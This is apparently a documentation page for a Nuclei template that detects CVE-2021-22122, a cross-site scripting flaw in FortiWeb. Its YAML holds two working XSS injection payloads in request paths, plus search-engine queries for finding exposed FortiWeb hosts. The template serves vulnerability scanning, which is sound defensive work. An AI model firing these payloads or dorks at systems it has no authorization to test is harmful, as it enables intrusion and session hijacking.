Skip to content
Nuclei Templates

FortiWeb - Cross Site Scripting

ID: CVE-2021-22122

Severity: medium

Author: dwisiswant0

Tags: cve2021,cve,fortiweb,xss,fortinet

Description

Section titled “Description”

FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.

YAML Source

Section titled “YAML Source”
id: CVE-2021-22122


info:
  name: FortiWeb - Cross Site Scripting
  author: dwisiswant0
  severity: medium
  description: |
    FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.
  impact: |
    Successful exploitation of this vulnerability can result in the compromise of sensitive user information, session hijacking.
  remediation: |
    Apply the latest security patches or updates provided by Fortinet to fix the XSS vulnerability in FortiWeb.
  reference:
    - https://www.fortiguard.com/psirt/FG-IR-20-122
    - https://twitter.com/ptswarm/status/1357316793753362433
    - https://fortiguard.com/advisory/FG-IR-20-122
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22122
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-22122
    cwe-id: CWE-79
    epss-score: 0.0548
    epss-percentile: 0.93181
    cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortinet
    product: fortiweb
    shodan-query: http.title:"fortiweb - "
    fofa-query: title="fortiweb - "
    google-query: intitle:"fortiweb - "
  tags: cve2021,cve,fortiweb,xss,fortinet


http:
  - method: GET
    path:
      - "{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//"
      - "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert('document.domain')"
          - "No policy has been chosen."
        condition: and
# digest: 4b0a00483046022100945fda034b844ac13374ce5ea9dcf143532afe36bf632b0b14dafb157dbcbfe0022100a17a6864aa60089652b1099abc785d6c63ceda8fb54cb8d6af89633de10328e8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-22122.yaml"

View on Github